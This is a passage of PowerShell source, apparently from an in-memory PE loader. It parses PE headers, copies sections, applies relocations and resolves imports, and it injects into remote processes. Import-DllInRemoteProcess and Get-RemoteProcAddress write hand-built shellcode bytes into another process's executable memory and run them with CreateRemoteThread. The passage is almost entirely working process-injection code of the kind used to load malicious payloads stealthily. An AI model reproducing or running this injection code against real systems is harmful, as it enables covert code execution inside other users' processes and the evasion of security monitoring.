  798. $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name PE64Bit -Value $false
  799. }
  800. return $NtHeadersInfo
  801. }
  802. Function Get-PEBasicInfo
  803. {
  804. Param(
  805. [Parameter( Position = 0, Mandatory = $true )]
  806. [Byte[]]
  807. $PEBytes,
  808. [Parameter(Position = 1, Mandatory = $true)]
  809. [System.Object]
  810. $Win32Types
  811. )
  812. $PEInfo = New-Object System.Object
  813. [IntPtr]$UnmanagedPEBytes = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PEBytes.Length)
  814. [System.Runtime.InteropServices.Marshal]::Copy($PEBytes, 0, $UnmanagedPEBytes, $PEBytes.Length) | Out-Null
  815. $NtHeadersInfo = Get-ImageNtHeaders -PEHandle $UnmanagedPEBytes -Win32Types $Win32Types
  816. $PEInfo | Add-Member -MemberType NoteProperty -Name 'PE64Bit' -Value ($NtHeadersInfo.PE64Bit)
  817. $PEInfo | Add-Member -MemberType NoteProperty -Name 'OriginalImageBase' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.ImageBase)
  818. $PEInfo | Add-Member -MemberType NoteProperty -Name 'SizeOfImage' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.SizeOfImage)
  819. $PEInfo | Add-Member -MemberType NoteProperty -Name 'SizeOfHeaders' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.SizeOfHeaders)
  820. $PEInfo | Add-Member -MemberType NoteProperty -Name 'DllCharacteristics' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.DllCharacteristics)
  821. [System.Runtime.InteropServices.Marshal]::FreeHGlobal($UnmanagedPEBytes)
  822. return $PEInfo
  823. }
  824. Function Get-PEDetailedInfo
  825. {
  826. Param(
  827. [Parameter( Position = 0, Mandatory = $true)]
  828. [IntPtr]
  829. $PEHandle,
  830. [Parameter(Position = 1, Mandatory = $true)]
  831. [System.Object]
  832. $Win32Types,
  833. [Parameter(Position = 2, Mandatory = $true)]
  834. [System.Object]
  835. $Win32Constants
  836. )
  837. if ($PEHandle -eq $null -or $PEHandle -eq [IntPtr]::Zero)
  838. {
  839. throw 'PEHandle is null or IntPtr.Zero'
  840. }
  841. $PEInfo = New-Object System.Object
  842. $NtHeadersInfo = Get-ImageNtHeaders -PEHandle $PEHandle -Win32Types $Win32Types
  843. $PEInfo | Add-Member -MemberType NoteProperty -Name PEHandle -Value $PEHandle
  844. $PEInfo | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS -Value ($NtHeadersInfo.IMAGE_NT_HEADERS)
  845. $PEInfo | Add-Member -MemberType NoteProperty -Name NtHeadersPtr -Value ($NtHeadersInfo.NtHeadersPtr)
  846. $PEInfo | Add-Member -MemberType NoteProperty -Name PE64Bit -Value ($NtHeadersInfo.PE64Bit)
  847. $PEInfo | Add-Member -MemberType NoteProperty -Name 'SizeOfImage' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.SizeOfImage)
  848. if ($PEInfo.PE64Bit -eq $true)
  849. {
  850. [IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.NtHeadersPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_NT_HEADERS64)))
  851. $PEInfo | Add-Member -MemberType NoteProperty -Name SectionHeaderPtr -Value $SectionHeaderPtr
  852. }
  853. else
  854. {
  855. [IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.NtHeadersPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_NT_HEADERS32)))
  856. $PEInfo | Add-Member -MemberType NoteProperty -Name SectionHeaderPtr -Value $SectionHeaderPtr
  857. }
  858. if (($NtHeadersInfo.IMAGE_NT_HEADERS.FileHeader.Characteristics -band $Win32Constants.IMAGE_FILE_DLL) -eq $Win32Constants.IMAGE_FILE_DLL)
  859. {
  860. $PEInfo | Add-Member -MemberType NoteProperty -Name FileType -Value 'DLL'
  861. }
  862. elseif (($NtHeadersInfo.IMAGE_NT_HEADERS.FileHeader.Characteristics -band $Win32Constants.IMAGE_FILE_EXECUTABLE_IMAGE) -eq $Win32Constants.IMAGE_FILE_EXECUTABLE_IMAGE)
  863. {
  864. $PEInfo | Add-Member -MemberType NoteProperty -Name FileType -Value 'EXE'
  865. }
  866. else
  867. {
  868. Throw "PE file is not an EXE or DLL"
  869. }
  870. return $PEInfo
  871. }
  872. Function Import-DllInRemoteProcess
  873. {
  874. Param(
  875. [Parameter(Position=0, Mandatory=$true)]
  876. [IntPtr]
  877. $RemoteProcHandle,
  878. [Parameter(Position=1, Mandatory=$true)]
  879. [IntPtr]
  880. $ImportDllPathPtr
  881. )
  882. $PtrSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr])
  883. $ImportDllPath = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($ImportDllPathPtr)
  884. $DllPathSize = [UIntPtr][UInt64]([UInt64]$ImportDllPath.Length + 1)
  885. $RImportDllPathPtr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, $DllPathSize, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)
  886. if ($RImportDllPathPtr -eq [IntPtr]::Zero)
  887. {
  888. Throw "Unable to allocate memory in the remote process"
  889. }
  890. [UIntPtr]$NumBytesWritten = [UIntPtr]::Zero
  891. $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RImportDllPathPtr, $ImportDllPathPtr, $DllPathSize, [Ref]$NumBytesWritten)
  892. if ($Success -eq $false)
  893. {
  894. Throw "Unable to write DLL path to remote process memory"
  895. }
  896. if ($DllPathSize -ne $NumBytesWritten)
  897. {
  898. Throw "Didn't write the expected amount of bytes when writing a DLL path to load to the remote process"
  899. }
  900. $Kernel32Handle = $Win32Functions.GetModuleHandle.Invoke("kernel32.dll")
  901. $LoadLibraryAAddr = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, "LoadLibraryA")
  902. [IntPtr]$DllAddress = [IntPtr]::Zero
  903. if ($PEInfo.PE64Bit -eq $true)
  904. {
  905. $LoadLibraryARetMem = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, $DllPathSize, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)
  906. if ($LoadLibraryARetMem -eq [IntPtr]::Zero)
  907. {
  908. Throw "Unable to allocate memory in the remote process for the return value of LoadLibraryA"
  909. }
  910. $LoadLibrarySC1 = @(0x53, 0x48, 0x89, 0xe3, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xb9)
  911. $LoadLibrarySC2 = @(0x48, 0xba)
  912. $LoadLibrarySC3 = @(0xff, 0xd2, 0x48, 0xba)
  913. $LoadLibrarySC4 = @(0x48, 0x89, 0x02, 0x48, 0x89, 0xdc, 0x5b, 0xc3)
  914. $SCLength = $LoadLibrarySC1.Length + $LoadLibrarySC2.Length + $LoadLibrarySC3.Length + $LoadLibrarySC4.Length + ($PtrSize * 3)
  915. $SCPSMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($SCLength)
  916. $SCPSMemOriginal = $SCPSMem
  917. Write-BytesToMemory -Bytes $LoadLibrarySC1 -MemoryAddress $SCPSMem
  918. $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($LoadLibrarySC1.Length)
  919. [System.Runtime.InteropServices.Marshal]::StructureToPtr($RImportDllPathPtr, $SCPSMem, $false)
  920. $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)
  921. Write-BytesToMemory -Bytes $LoadLibrarySC2 -MemoryAddress $SCPSMem
  922. $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($LoadLibrarySC2.Length)
  923. [System.Runtime.InteropServices.Marshal]::StructureToPtr($LoadLibraryAAddr, $SCPSMem, $false)
  924. $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)
  925. Write-BytesToMemory -Bytes $LoadLibrarySC3 -MemoryAddress $SCPSMem
  926. $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($LoadLibrarySC3.Length)
  927. [System.Runtime.InteropServices.Marshal]::StructureToPtr($LoadLibraryARetMem, $SCPSMem, $false)
  928. $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)
  929. Write-BytesToMemory -Bytes $LoadLibrarySC4 -MemoryAddress $SCPSMem
  930. $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($LoadLibrarySC4.Length)
  931. $RSCAddr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, [UIntPtr][UInt64]$SCLength, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE)
  932. if ($RSCAddr -eq [IntPtr]::Zero)
  933. {
  934. Throw "Unable to allocate memory in the remote process for shellcode"
  935. }
  936. $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RSCAddr, $SCPSMemOriginal, [UIntPtr][UInt64]$SCLength, [Ref]$NumBytesWritten)
  937. if (($Success -eq $false) -or ([UInt64]$NumBytesWritten -ne [UInt64]$SCLength))
  938. {
  939. Throw "Unable to write shellcode to remote process memory."
  940. }
  941. $RThreadHandle = Invoke-CreateRemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $RSCAddr -Win32Functions $Win32Functions
  942. $Result = $Win32Functions.WaitForSingleObject.Invoke($RThreadHandle, 20000)
  943. if ($Result -ne 0)
  944. {
  945. Throw "Call to CreateRemoteThread to call GetProcAddress failed."
  946. }
  947. [IntPtr]$ReturnValMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PtrSize)
  948. $Result = $Win32Functions.ReadProcessMemory.Invoke($RemoteProcHandle, $LoadLibraryARetMem, $ReturnValMem, [UIntPtr][UInt64]$PtrSize, [Ref]$NumBytesWritten)
  949. if ($Result -eq $false)
  950. {
  951. Throw "Call to ReadProcessMemory failed"
  952. }
  953. [IntPtr]$DllAddress = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ReturnValMem, [Type][IntPtr])
  954. $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $LoadLibraryARetMem, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null
  955. $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RSCAddr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null
  956. }
  957. else
  958. {
  959. [IntPtr]$RThreadHandle = Invoke-CreateRemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $LoadLibraryAAddr -ArgumentPtr $RImportDllPathPtr -Win32Functions $Win32Functions
  960. $Result = $Win32Functions.WaitForSingleObject.Invoke($RThreadHandle, 20000)
  961. if ($Result -ne 0)
  962. {
  963. Throw "Call to CreateRemoteThread to call GetProcAddress failed."
  964. }
  965. [Int32]$ExitCode = 0
  966. $Result = $Win32Functions.GetExitCodeThread.Invoke($RThreadHandle, [Ref]$ExitCode)
  967. if (($Result -eq 0) -or ($ExitCode -eq 0))
  968. {
  969. Throw "Call to GetExitCodeThread failed"
  970. }
  971. [IntPtr]$DllAddress = [IntPtr]$ExitCode
  972. }
  973. $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RImportDllPathPtr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null
  974. return $DllAddress
  975. }
  976. Function Get-RemoteProcAddress
  977. {
  978. Param(
  979. [Parameter(Position=0, Mandatory=$true)]
  980. [IntPtr]
  981. $RemoteProcHandle,
  982. [Parameter(Position=1, Mandatory=$true)]
  983. [IntPtr]
  984. $RemoteDllHandle,
  985. [Parameter(Position=2, Mandatory=$true)]
  986. [String]
  987. $FunctionName
  988. )
  989. $PtrSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr])
  990. $FunctionNamePtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalAnsi($FunctionName)
  991. $FunctionNameSize = [UIntPtr][UInt64]([UInt64]$FunctionName.Length + 1)
  992. $RFuncNamePtr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, $FunctionNameSize, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)
  993. if ($RFuncNamePtr -eq [IntPtr]::Zero)
  994. {
  995. Throw "Unable to allocate memory in the remote process"
  996. }
  997. [UIntPtr]$NumBytesWritten = [UIntPtr]::Zero
  998. $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RFuncNamePtr, $FunctionNamePtr, $FunctionNameSize, [Ref]$NumBytesWritten)
  999. [System.Runtime.InteropServices.Marshal]::FreeHGlobal($FunctionNamePtr)
  1000. if ($Success -eq $false)
  1001. {
  1002. Throw "Unable to write DLL path to remote process memory"
  1003. }
  1004. if ($FunctionNameSize -ne $NumBytesWritten)
  1005. {
  1006. Throw "Didn't write the expected amount of bytes when writing a DLL path to load to the remote process"
  1007. }
  1008. $Kernel32Handle = $Win32Functions.GetModuleHandle.Invoke("kernel32.dll")
  1009. $GetProcAddressAddr = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, "GetProcAddress")
  1010. $GetProcAddressRetMem = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, [UInt64][UInt64]$PtrSize, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)
  1011. if ($GetProcAddressRetMem -eq [IntPtr]::Zero)
  1012. {
  1013. Throw "Unable to allocate memory in the remote process for the return value of GetProcAddress"
  1014. }
  1015. [Byte[]]$GetProcAddressSC = @()
  1016. if ($PEInfo.PE64Bit -eq $true)
  1017. {
  1018. $GetProcAddressSC1 = @(0x53, 0x48, 0x89, 0xe3, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xb9)
  1019. $GetProcAddressSC2 = @(0x48, 0xba)
  1020. $GetProcAddressSC3 = @(0x48, 0xb8)
  1021. $GetProcAddressSC4 = @(0xff, 0xd0, 0x48, 0xb9)
  1022. $GetProcAddressSC5 = @(0x48, 0x89, 0x01, 0x48, 0x89, 0xdc, 0x5b, 0xc3)
  1023. }
  1024. else
  1025. {
  1026. $GetProcAddressSC1 = @(0x53, 0x89, 0xe3, 0x83, 0xe4, 0xc0, 0xb8)
  1027. $GetProcAddressSC2 = @(0xb9)
  1028. $GetProcAddressSC3 = @(0x51, 0x50, 0xb8)
  1029. $GetProcAddressSC4 = @(0xff, 0xd0, 0xb9)
  1030. $GetProcAddressSC5 = @(0x89, 0x01, 0x89, 0xdc, 0x5b, 0xc3)
  1031. }
  1032. $SCLength = $GetProcAddressSC1.Length + $GetProcAddressSC2.Length + $GetProcAddressSC3.Length + $GetProcAddressSC4.Length + $GetProcAddressSC5.Length + ($PtrSize * 4)
  1033. $SCPSMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($SCLength)
  1034. $SCPSMemOriginal = $SCPSMem
  1035. Write-BytesToMemory -Bytes $GetProcAddressSC1 -MemoryAddress $SCPSMem
  1036. $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC1.Length)
  1037. [System.Runtime.InteropServices.Marshal]::StructureToPtr($RemoteDllHandle, $SCPSMem, $false)
  1038. $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)
  1039. Write-BytesToMemory -Bytes $GetProcAddressSC2 -MemoryAddress $SCPSMem
  1040. $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC2.Length)
  1041. [System.Runtime.InteropServices.Marshal]::StructureToPtr($RFuncNamePtr, $SCPSMem, $false)
  1042. $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)
  1043. Write-BytesToMemory -Bytes $GetProcAddressSC3 -MemoryAddress $SCPSMem
  1044. $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC3.Length)
  1045. [System.Runtime.InteropServices.Marshal]::StructureToPtr($GetProcAddressAddr, $SCPSMem, $false)
  1046. $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)
  1047. Write-BytesToMemory -Bytes $GetProcAddressSC4 -MemoryAddress $SCPSMem
  1048. $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC4.Length)
  1049. [System.Runtime.InteropServices.Marshal]::StructureToPtr($GetProcAddressRetMem, $SCPSMem, $false)
  1050. $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)
  1051. Write-BytesToMemory -Bytes $GetProcAddressSC5 -MemoryAddress $SCPSMem
  1052. $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC5.Length)
  1053. $RSCAddr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, [UIntPtr][UInt64]$SCLength, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE)
  1054. if ($RSCAddr -eq [IntPtr]::Zero)
  1055. {
  1056. Throw "Unable to allocate memory in the remote process for shellcode"
  1057. }
  1058. $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RSCAddr, $SCPSMemOriginal, [UIntPtr][UInt64]$SCLength, [Ref]$NumBytesWritten)
  1059. if (($Success -eq $false) -or ([UInt64]$NumBytesWritten -ne [UInt64]$SCLength))
  1060. {
  1061. Throw "Unable to write shellcode to remote process memory."
  1062. }
  1063. $RThreadHandle = Invoke-CreateRemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $RSCAddr -Win32Functions $Win32Functions
  1064. $Result = $Win32Functions.WaitForSingleObject.Invoke($RThreadHandle, 20000)
  1065. if ($Result -ne 0)
  1066. {
  1067. Throw "Call to CreateRemoteThread to call GetProcAddress failed."
  1068. }
  1069. [IntPtr]$ReturnValMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PtrSize)
  1070. $Result = $Win32Functions.ReadProcessMemory.Invoke($RemoteProcHandle, $GetProcAddressRetMem, $ReturnValMem, [UIntPtr][UInt64]$PtrSize, [Ref]$NumBytesWritten)
  1071. if (($Result -eq $false) -or ($NumBytesWritten -eq 0))
  1072. {
  1073. Throw "Call to ReadProcessMemory failed"
  1074. }
  1075. [IntPtr]$ProcAddress = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ReturnValMem, [Type][IntPtr])
  1076. $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RSCAddr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null
  1077. $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RFuncNamePtr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null
  1078. $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $GetProcAddressRetMem, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null
  1079. return $ProcAddress
  1080. }
  1081. Function Copy-Sections
  1082. {
  1083. Param(
  1084. [Parameter(Position = 0, Mandatory = $true)]
  1085. [Byte[]]
  1086. $PEBytes,
  1087. [Parameter(Position = 1, Mandatory = $true)]
  1088. [System.Object]
  1089. $PEInfo,
  1090. [Parameter(Position = 2, Mandatory = $true)]
  1091. [System.Object]
  1092. $Win32Functions,
  1093. [Parameter(Position = 3, Mandatory = $true)]
  1094. [System.Object]
  1095. $Win32Types
  1096. )
  1097. for( $i = 0; $i -lt $PEInfo.IMAGE_NT_HEADERS.FileHeader.NumberOfSections; $i++)
  1098. {
  1099. [IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.SectionHeaderPtr) ($i * [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_SECTION_HEADER)))
  1100. $SectionHeader = [System.Runtime.InteropServices.Marshal]::PtrToStructure($SectionHeaderPtr, [Type]$Win32Types.IMAGE_SECTION_HEADER)
  1101. [IntPtr]$SectionDestAddr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$SectionHeader.VirtualAddress))
  1102. $SizeOfRawData = $SectionHeader.SizeOfRawData
  1103. if ($SectionHeader.PointerToRawData -eq 0)
  1104. {
  1105. $SizeOfRawData = 0
  1106. }
  1107. if ($SizeOfRawData -gt $SectionHeader.VirtualSize)
  1108. {
  1109. $SizeOfRawData = $SectionHeader.VirtualSize
  1110. }
  1111. if ($SizeOfRawData -gt 0)
  1112. {
  1113. Test-MemoryRangeValid -DebugString "Copy-Sections::MarshalCopy" -PEInfo $PEInfo -StartAddress $SectionDestAddr -Size $SizeOfRawData | Out-Null
  1114. [System.Runtime.InteropServices.Marshal]::Copy($PEBytes, [Int32]$SectionHeader.PointerToRawData, $SectionDestAddr, $SizeOfRawData)
  1115. }
  1116. if ($SectionHeader.SizeOfRawData -lt $SectionHeader.VirtualSize)
  1117. {
  1118. $Difference = $SectionHeader.VirtualSize - $SizeOfRawData
  1119. [IntPtr]$StartAddress = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$SectionDestAddr) ([Int64]$SizeOfRawData))
  1120. Test-MemoryRangeValid -DebugString "Copy-Sections::Memset" -PEInfo $PEInfo -StartAddress $StartAddress -Size $Difference | Out-Null
  1121. $Win32Functions.memset.Invoke($StartAddress, 0, [IntPtr]$Difference) | Out-Null
  1122. }
  1123. }
  1124. }
  1125. Function Update-MemoryAddresses
  1126. {
  1127. Param(
  1128. [Parameter(Position = 0, Mandatory = $true)]
  1129. [System.Object]
  1130. $PEInfo,
  1131. [Parameter(Position = 1, Mandatory = $true)]
  1132. [Int64]
  1133. $OriginalImageBase,
  1134. [Parameter(Position = 2, Mandatory = $true)]
  1135. [System.Object]
  1136. $Win32Constants,
  1137. [Parameter(Position = 3, Mandatory = $true)]
  1138. [System.Object]
  1139. $Win32Types
  1140. )
  1141. [Int64]$BaseDifference = 0
  1142. $AddDifference = $true
  1143. [UInt32]$ImageBaseRelocSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_BASE_RELOCATION)
  1144. if (($OriginalImageBase -eq [Int64]$PEInfo.EffectivePEHandle) `
  1145. -or ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.BaseRelocationTable.Size -eq 0))
  1146. {
  1147. return
  1148. }
  1149. elseif ((Compare-Val1GreaterThanVal2AsUInt ($OriginalImageBase) ($PEInfo.EffectivePEHandle)) -eq $true)
  1150. {
  1151. $BaseDifference = Sub-SignedIntAsUnsigned ($OriginalImageBase) ($PEInfo.EffectivePEHandle)
  1152. $AddDifference = $false
  1153. }
  1154. elseif ((Compare-Val1GreaterThanVal2AsUInt ($PEInfo.EffectivePEHandle) ($OriginalImageBase)) -eq $true)
  1155. {
  1156. $BaseDifference = Sub-SignedIntAsUnsigned ($PEInfo.EffectivePEHandle) ($OriginalImageBase)
  1157. }
  1158. [IntPtr]$BaseRelocPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$PEInfo.IMAGE_NT_HEADERS.OptionalHeader.BaseRelocationTable.VirtualAddress))
  1159. while($true)
  1160. {
  1161. $BaseRelocationTable = [System.Runtime.InteropServices.Marshal]::PtrToStructure($BaseRelocPtr, [Type]$Win32Types.IMAGE_BASE_RELOCATION)
  1162. if ($BaseRelocationTable.SizeOfBlock -eq 0)
  1163. {
  1164. break
  1165. }
  1166. [IntPtr]$MemAddrBase = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$BaseRelocationTable.VirtualAddress))
  1167. $NumRelocations = ($BaseRelocationTable.SizeOfBlock - $ImageBaseRelocSize) / 2
  1168. for($i = 0; $i -lt $NumRelocations; $i++)
  1169. {
  1170. $RelocationInfoPtr = [IntPtr](Add-SignedIntAsUnsigned ([IntPtr]$BaseRelocPtr) ([Int64]$ImageBaseRelocSize + (2 * $i)))
  1171. [UInt16]$RelocationInfo = [System.Runtime.InteropServices.Marshal]::PtrToStructure($RelocationInfoPtr, [Type][UInt16])
  1172. [UInt16]$RelocOffset = $RelocationInfo -band 0x0FFF
  1173. [UInt16]$RelocType = $RelocationInfo -band 0xF000
  1174. for ($j = 0; $j -lt 12; $j++)
  1175. {
  1176. $RelocType = [Math]::Floor($RelocType / 2)
  1177. }
  1178. if (($RelocType -eq $Win32Constants.IMAGE_REL_BASED_HIGHLOW) `
  1179. -or ($RelocType -eq $Win32Constants.IMAGE_REL_BASED_DIR64))
  1180. {
  1181. [IntPtr]$FinalAddr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$MemAddrBase) ([Int64]$RelocOffset))
  1182. [IntPtr]$CurrAddr = [System.Runtime.InteropServices.Marshal]::PtrToStructure($FinalAddr, [Type][IntPtr])
  1183. if ($AddDifference -eq $true)
  1184. {
  1185. [IntPtr]$CurrAddr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$CurrAddr) ($BaseDifference))
  1186. }
  1187. else
  1188. {
  1189. [IntPtr]$CurrAddr = [IntPtr](Sub-SignedIntAsUnsigned ([Int64]$CurrAddr) ($BaseDifference))
  1190. }
  1191. [System.Runtime.InteropServices.Marshal]::StructureToPtr($CurrAddr, $FinalAddr, $false) | Out-Null
  1192. }
  1193. elseif ($RelocType -ne $Win32Constants.IMAGE_REL_BASED_ABSOLUTE)
  1194. {
  1195. Throw "Unknown relocation found, relocation value: $RelocType, relocationinfo: $RelocationInfo"
  1196. }
  1197. }
  1198. $BaseRelocPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$BaseRelocPtr) ([Int64]$BaseRelocationTable.SizeOfBlock))
  1199. }
  1200. }
  1201. Function Import-DllImports
  1202. {
  1203. Param(
  1204. [Parameter(Position = 0, Mandatory = $true)]
  1205. [System.Object]
  1206. $PEInfo,
  1207. [Parameter(Position = 1, Mandatory = $true)]
  1208. [System.Object]
  1209. $Win32Functions,
  1210. [Parameter(Position = 2, Mandatory = $true)]
  1211. [System.Object]
  1212. $Win32Types,
  1213. [Parameter(Position = 3, Mandatory = $true)]
  1214. [System.Object]
  1215. $Win32Constants,
  1216. [Parameter(Position = 4, Mandatory = $false)]
  1217. [IntPtr]
  1218. $RemoteProcHandle
  1219. )
  1220. $RemoteLoading = $false
  1221. if ($PEInfo.PEHandle -ne $PEInfo.EffectivePEHandle)
  1222. {
  1223. $RemoteLoading = $true
  1224. }
  1225. if ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.Size -gt 0)
  1226. {
  1227. [IntPtr]$ImportDescriptorPtr = Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.VirtualAddress)
  1228. while ($true)
  1229. {
  1230. $ImportDescriptor = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ImportDescriptorPtr, [Type]$Win32Types.IMAGE_IMPORT_DESCRIPTOR)
  1231. if ($ImportDescriptor.Characteristics -eq 0 `
  1232. -and $ImportDescriptor.FirstThunk -eq 0 `
  1233. -and $ImportDescriptor.ForwarderChain -eq 0 `
  1234. -and $ImportDescriptor.Name -eq 0 `
  1235. -and $ImportDescriptor.TimeDateStamp -eq 0)
  1236. {
  1237. break
  1238. }
  1239. $ImportDllHandle = [IntPtr]::Zero
  1240. $ImportDllPathPtr = (Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$ImportDescriptor.Name))
  1241. $ImportDllPath = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($ImportDllPathPtr)
  1242. if ($RemoteLoading -eq $true)
  1243. {
  1244. $ImportDllHandle = Import-DllInRemoteProcess -RemoteProcHandle $RemoteProcHandle -ImportDllPathPtr $ImportDllPathPtr
  1245. }
  1246. else
  1247. {
  1248. $ImportDllHandle = $Win32Functions.LoadLibrary.Invoke($ImportDllPath)
  1249. }
  1250. if (($ImportDllHandle -eq $null) -or ($ImportDllHandle -eq [IntPtr]::Zero))
  1251. {
  1252. throw "Error importing DLL, DLLName: $ImportDllPath"
  1253. }
  1254. [IntPtr]$ThunkRef = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($ImportDescriptor.FirstThunk)
  1255. [IntPtr]$OriginalThunkRef = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($ImportDescriptor.Characteristics) #Characteristics is overloaded with OriginalFirstThunk
  1256. [IntPtr]$OriginalThunkRefVal = [System.Runtime.InteropServices.Marshal]::PtrToStructure($OriginalThunkRef, [Type][IntPtr])
  1257. while ($OriginalThunkRefVal -ne [IntPtr]::Zero)
  1258. {
  1259. $ProcedureName = ''
  1260. [IntPtr]$NewThunkRef = [IntPtr]::Zero
  1261. if([Int64]$OriginalThunkRefVal -lt 0)
  1262. {
  1263. $ProcedureName = [Int64]$OriginalThunkRefVal -band 0xffff #This is actually a lookup by ordinal
  1264. }
  1265. else
  1266. {
  1267. [IntPtr]$StringAddr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($OriginalThunkRefVal)
  1268. $StringAddr = Add-SignedIntAsUnsigned $StringAddr ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][UInt16]))
  1269. $ProcedureName = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($StringAddr)
  1270. }
